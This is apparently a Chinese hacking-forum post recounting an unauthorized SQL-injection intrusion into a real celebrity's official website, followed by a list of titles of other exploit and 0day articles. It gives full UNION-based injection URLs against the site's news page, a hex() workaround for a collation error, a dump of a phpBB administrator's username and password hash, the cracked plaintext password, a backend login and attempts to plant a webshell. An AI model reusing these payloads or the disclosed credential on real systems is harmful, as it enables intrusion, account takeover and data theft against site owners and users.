[组图]检测周杰伦官方网站开始操作,提交
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME%20%20from%20information_schema.STATISTICS/*
貌似没有出现想象中的效果
提示
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
看来是union 前后字符集不搭配,只好编码一下了,提交
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,hex(TABLE_SCHEMA),hex(TABLE_NAME),hex(COLUMN_NAME)%20%20from%20information_schema.STATISTICS/*
这次正常了,连上我自己的mysql,将16进制的编码还原
mysql> select 0x6A6179776562;
+----------------+
| 0x6A6179776562 |
+----------------+
| jayweb |
+----------------+
1 row in set (0.00 sec)
mysql> select 0x41646D696E5F4964;
+--------------------+
| 0x41646D696E5F4964 |
+--------------------+
| Admin_Id |
+--------------------+
1 row in set (0.00 sec)
mysql> select 0x61646D696E;
+--------------+
| 0x61646D696E |
+--------------+
| admin |
+--------------+
1 row in set (0.00 sec)
这里表名出来了,是admin,但是没有暴出密码字段名,我们可以通过使用limit语法逐个表和字段查询,但是数据库很多表的话,不晓得什么时候才能摸清楚。刚好网站上有个phpbb的论坛,还是通过跨库查论坛数据库吧。
看了下,管理员有一个admin一个webmater,看样子webmater比较活跃,就查他的密码了。
提交
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,username,user_password%20%20from%20phpbb_users%20where%20user_id=66333
到www.cmd5.com上查询出来密码是 :042990
登陆后台去参观下吧 :)
对phpbb不是很熟悉,在后台琢磨了半天,尝试了添加上传类型等办法都没能得到webshell,难道只能渗透到这个程度吗?
| 检测周杰伦官方网站 | 10-05 | |
| 入侵远古VOD 0day | 10-05 | |
| Discuz!6.0.0注入漏洞 | 09-27 | |
| 动网8.0最新远程注入漏洞来了 | 09-22 | |
| 利用最近热门的Xss漏洞能做什么? | 09-10 | |
| Dz0724补丁补掉的一个xss+补掉的 | 09-04 | |
| 浪人下载和浪人文章的漏洞利用 | 09-01 | |
| XSS跨站脚本及SQL注入漏洞技术分 | 08-27 | |
| 风讯注入0day | 08-25 | |
| 动易2006_SP6最新漏洞得到管理员 | 08-20 | |
| Dvbbs8严重漏洞 | 08-11 | |
| oblog商业版本4.6注射漏洞,直接 | 08-11 | |
您现在的位置: